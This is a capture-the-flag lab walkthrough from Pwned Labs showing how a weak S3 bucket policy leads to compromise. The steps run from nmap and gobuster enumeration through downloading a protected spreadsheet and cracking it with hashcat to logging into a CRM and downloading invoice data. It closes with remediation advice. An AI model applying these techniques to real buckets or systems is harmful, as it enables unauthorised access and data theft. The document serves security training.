Exploiting Weak S3 Bucket Policies
A walkthrough demonstrating how weak S3 Bucket policies can lead to system compromise, data exposure and exfiltration.
CTF Source: Pwned Labs
Overview
In this walkthrough, we're tasked with accessing sensitive data and demonstrating the extent of impact using an IP address and some AWS Access Keys discovered on a previous engagement.
Pre-Requisites
Install awscli: brew install awscli
(mac) apt install awscli
(linux)
Install nmap: brew install nmap
(mac) apt intall nmap
(linux)
Install gobuster: brew install gobuster
(mac) apt intall gobuster
(linux)
Install hashcat: brew install hashcat
(mac) apt intall hashcat
(linux)
Install JohnTheRipper: brew install john
(mac) apt intall john
(linux)
Walkthrough
To start, we’re given an IP of 13.43.144.61
And some AWS Access Keys for the user, test
Nmap Enumeration
After configuring our AWS access keys (aws configure
), let’s run some nmap scans and see what we’re dealing with.
Alright so looks like we’re dealing with a website on port 3000
.
Gobuster Enumeration
Before we view the web page in the browser, let’s kick off a gobuster scan.
Gobuster will enumerate over our wordlist and attempt to find other directories that may exist.-b 404
means we’ll hide any results that do not exist.
Let’s let this run and come to it later.
Website Enumeration
We can view the site in our browser but it looks like a pretty standard website.
Looking at the source code though and we find an S3 bucket endpoint!
S3 Bucket Enumeration
It doesn’t appear we can see the data from the browser.
Let’s try the AWS CLI instead. Both of these commands fail.
But the command to retrieve the bucket policy works!
Check that out! Let’s copy that backup.xlsx
file locally since we have the permission (s3:GetObject
)
If we try to open the file we’ll see it’s password protected.
Cracking the Password with Hashcat
Let’s attempt to crack the password on this xlsx
file.
Since I’m on Kali Linux, I’m going to run a tool called john2office
because this is a Microsoft Office file.
You can find the full toolset here.
Now we have a hash of the file and it looks like it’s an Office 2013 file.
Next, we will use a tool called hashcat
and attempt to crack the file password.
First, we need to determine the hash type to use. We can do this like so, hashcat --help | grep Office
So our hash type is 9600
.
Now let’s verify the hash is in the correct format.
We can refer to hashcat’s documentation and look for an example of an Office 2013 hash.
If we compare this to the hash generated by office2john
, we see we need to modify the hash and remove backup.xlsx:
Let’s run the cracking with a popular wordlist, rockyou
.
We cracked the password!
Side note, if you rerun this command, it won’t return the password.
This is because it was already cracked and is stored in the file located here ~/.local/share/hashcat/hashcat.potfile
.
Now we can see that xlsx
file and find a ton of credentials to several systems!
Gaining Access to the Website
Remember the gobuster
scan we ran earlier? Let’s check on how that’s going.
Looks like we successfully found some more directories!
If we navigate to the page http://13.43.144.61:3000/crm
we’re met with a login page.
Let’s try the credentials from our file for the WebCRM
system to see if they work.
We’re in!
Exfiltrating Data and Finding the Flag!
Poking around, we can find some Invoice data. We’ll download that since there isn’t much else to do.
Opening this up we find the Flag!
Wrap Up
In this scenario, we were tasked with accessing sensitive data with AWS credentials discovered in a previous engagement. After enumerating our access to an S3 bucket we found a password-protected file. After cracking this file, it revealed credentials to several systems. Using these credentials, we gained access to the CRM platform and obtained access to sensitive data. Here are some recommended actions administrators can take to prevent this from happening.
Tighten the S3 Bucket Policy
“Everyone” could perform the following actions,
s3:GetBucketPolicy
Not needed by everyone, restrict to admins
s3:GetObject
Okay for a website but non-website data was also stored in this bucket (see #2)
s3:GetObjectAcl
Not needed by everyone, restrict to admins
Eliminate S3 bucket multi-use
Using an S3 bucket for multiple purposes can lead to unintended consequences like information disclosure due to a lax or complicated bucket policy.
Since this bucket is hosting a publicly accessible website, only store files relevant to the website.
Ensure employees are trained and have access to a credential manager
In this case, a spreadsheet was found containing login credentials to several systems.
Securely store credentials in solutions such as Bitwarden, 1Password, AWS Secrets Manager, HashiCorp Vault, or similar.
Secure login to CRM system
Protect access to the CRM system by removing (or restricting) public access, restricting login behind SSO, and requiring MFA.
Last updated